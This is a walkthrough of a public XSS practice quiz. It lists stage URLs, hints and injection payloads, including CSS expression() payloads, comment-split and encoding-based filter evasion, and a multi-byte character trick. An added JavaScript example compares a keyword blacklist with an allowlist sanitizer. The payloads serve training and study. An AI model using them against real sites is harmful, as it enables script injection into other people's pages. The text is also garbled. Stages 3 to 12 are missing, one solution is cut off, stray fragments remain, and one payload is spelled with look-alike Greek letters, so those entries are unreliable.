XSS Challenges


http://xss-quiz.int21h.jp/
Notes (for all stages):
* NEVER DO ANY ATTACKS EXCEPT XSS.
* DO NOT USE ANY AUTOMATED SCANNER (AppScan, WebInspect, WVS, ...)
* Some stages may fit only IE.

Stage #1:
URL: http://xss-quiz.int21h.jp/?sid=7b2ec32a44f5676dbc2ad38d82708b4e48d596df
Hint: very simple...
Solution: Xssss""Xssss

Stage #2:
URL: http://xss-quiz.int21h.jp/stage2.php?sid=4998593ac8245a1e877a2c16905603858fa94e8f
Hint: close the current tag and add SCRIPT tag...
Solution: Xssss">

Solution: p1=Xssss">Xssss
\"\']//g;"
Solution: ``οnfοcus=alert(document.domain)

Stage #13: STYLE
URL: http://xss-quiz.int21h.jp/stage13_0.php?sid=9b00913b1a60ca6344c1f26a6d352af3d7ee4c72
Hint: style attribute
Solution: background-color:salmon;input:expression(javascript:alert(document.domain)) (in IE the alert box pops up in a loop)
Solution: background-color:salmon;input:expression((window.x==1)?'':(window.x=1,alert(document.domain)))

Stage #14: STYLE, comment delimiter
URL: http://xss-quiz.int21h.jp/stage-_-14.php?sid=a629a8aaa2a217f28046edb7722a9083f4612419
Hint: s/(url|script|eval|expression)/xxx/ig;
Solution: background-color:salmon;input:e/**/xpression((window.x==1)?'':(window.x=1,alert(document.domain)))
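
Added example (not part of the original notes or the challenge site's code): the Stage #14 hint's substitution written as a JavaScript regex and run against the Stage #13 and Stage #14 strings above, beside an allowlist validator for style values. `stage14Blacklist`, `ALLOWED` and `sanitizeStyle` are hypothetical names, and the allowed properties and value patterns are assumptions.

```javascript
// Stage #14 hint transcribed as a JavaScript regex: s/(url|script|eval|expression)/xxx/ig
function stage14Blacklist(input) {
  return input.replace(/(url|script|eval|expression)/ig, "xxx");
}

// Hypothetical allowlist (assumption): property -> pattern the whole value must match.
const ALLOWED = {
  "background-color": /^(#[0-9a-f]{3}|#[0-9a-f]{6}|[a-z]{3,20})$/i, // hex or a bare colour word
  "color": /^(#[0-9a-f]{3}|#[0-9a-f]{6}|[a-z]{3,20})$/i,
  "width": /^\d{1,4}(px|%)$/,
};

// Returns a rebuilt style string, or null if any declaration is not on the allowlist.
function sanitizeStyle(input) {
  const out = [];
  for (const decl of input.split(";")) {
    if (decl.trim() === "") continue;          // tolerate a trailing ';'
    const idx = decl.indexOf(":");
    if (idx < 0) return null;                  // not a "property: value" pair
    const prop = decl.slice(0, idx).trim().toLowerCase();
    const value = decl.slice(idx + 1).trim();
    const known = Object.prototype.hasOwnProperty.call(ALLOWED, prop);
    if (!known || !ALLOWED[prop].test(value)) return null;
    out.push(prop + ": " + value);
  }
  return out.length ? out.join("; ") : null;
}

// Inputs copied verbatim from the Stage #13 and Stage #14 entries on this page.
const stage13 = "background-color:salmon;input:expression((window.x==1)?'':(window.x=1,alert(document.domain)))";
const stage14 = "background-color:salmon;input:e/**/xpression((window.x==1)?'':(window.x=1,alert(document.domain)))";

function demo() {
  return {
    blacklistChanges13: stage14Blacklist(stage13) !== stage13, // keyword present, so it is rewritten
    blacklistChanges14: stage14Blacklist(stage14) !== stage14, // comment splits the keyword, no match
    allowlist13: sanitizeStyle(stage13),
    allowlist14: sanitizeStyle(stage14),
    allowlistBenign: sanitizeStyle("background-color:salmon; width:120px"), // constructed input
  };
}

console.log(demo());
```

The keyword substitution only sees the literal spelling, so the comment-split form passes through unchanged; the allowlist rejects both strings because `input` is not a permitted property and the value never reaches the pattern check.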

Stage #15: filtering -- encoding
URL: http://xss-quiz.int21h.jp/stage__15.php?sid=0480521f1f39f182becacfbedf36210ca0140fe5
Hint: document.write();
Solution: hogehoge\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e

Stage #16: filtering -- encoding
URL: http://xss-quiz.int21h.jp/stage00000016.php?sid=9c7972a074c9caf57100746acaab2864cd2dff2e
Hint: "document.write();" and "s/\\x/\\\\x/ig;"
Solution: hogehoge\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e

Stage #17:
URL: http://xss-quiz.int21h.jp/stage-No17.php?sid=53f40e41f2c7a0eef557e1f469e312e02aa0ddba
Hint: multi-byte character
Solution: p1=1%A7&p2=+onmouseover%3Dalert%28document.domain%29%3B+%A7

Stage #18:
URL: http://xss-quiz.int21h.jp/stage__No18.php?sid=66431e719a0b192f11d5c86252382c114ad7dda3
Hint: us-ascii high bit issue

Stage #19:
URL: http://xss-quiz.int21h.jp/stage_--19.php?sid=e32c8f9cd60f79786b67defb896fad8a7c7f461a
Hint: Twitter DomXss at Sep 24, 2010
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
Other solutions:
http://blogs.tunelko.com/2013/12/02/xss-challenges/
http://blog.knownsec.com/Knownsec_RD_Checklist/xss/xss_quiz.txt

Recommended:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
